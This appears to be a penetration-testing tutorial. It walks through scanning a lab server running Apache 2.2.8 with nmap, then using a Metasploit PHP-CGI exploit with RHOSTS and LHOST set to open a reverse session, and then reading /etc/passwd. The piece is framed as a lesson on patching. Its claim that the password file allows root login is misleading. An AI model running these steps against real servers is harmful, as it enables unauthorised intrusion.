Apache is widely used on hundreds of thousands of web servers across the internet. Therefore the chances of finding Apache servers which are running older versions is highly likely, and with hundreds of vulnerabilities coming to light over the years it is all too easy to find an exploit for older versions and gain a root shell. Here we find a server running Apache 2.2.8 on port 80 and show how we can then fully compromise the server in under 3 minutes, and access the password file.
We touch on this time and again just how important it is to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server it is at risk of being compromised very quickly.
In this tutorial we are using just nmap and metasploit framework which are built into Kali linux which we use for most of our tutorials. Download is here; https://www.kali.org/downloads/
First we scan the web server which has an IP address of 192.168.56.103 with nmap to identify open ports and the services running on those ports using the following cmd.
nmap -sV -sT –version-all -p 80 192.168.56.103
There is a great cheat sheet here for nmap cmds to help better understand what we are doing; https://www.stationx.net/nmap-cheat-sheet/
This shows us that port 80- is open, that it is running Apache and it gives us the version. All we do from here is go googling to find vulnerabilities for that version, and the year that version came out. Then we can choose either to target the version directly or find an exploit that came out after that version was released. You can use CVE numbers for that as the first part denotes the year is was discovered.
Apache 2.2.8 was released on the 19th of January, 2008!! Let’s look for a CVE from after that date and one that is already available in metasploit framework.
I’m not going to teach you how to google…….but my search brought up a vulnerability in a php cgi script which was the default for that version of Apache. There will be loads of exploits available for this version due to it’s age, we just decided to use this one as it is super reliable for the video demo.
Let’s fire up metasploit and find it.
search type:exploit multi/http/php
We could has also searched by date. Anyway, the one we want is number 0 so we simply type
It has already configured a payload for us so we check the info on the exploit
Once we’re happy we check which options we need to add to allow it to run.
We can see in the options what is required and what is not by reading the “required” column.
- RHOSTS – This is the Remote hosts or the victim machines. We need to set the correct IP address so the exploit knows which machine(s) to target.
- LHOST – This is the listening host. This is your machines IP address so the exploit knows which machine to connect back to with the remote session spawned by the exploit.
We do this by using the “set” cmd
set RHOSTS 192.168.56.103
set LHOST 192.168.56.106
Now we have everything configured we just give the “run” cmd which starts the exploit against the victim, and you can see from the video just how quick it is.
All we do now access the password file by using;
“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can login as admin/root and do whatever we want.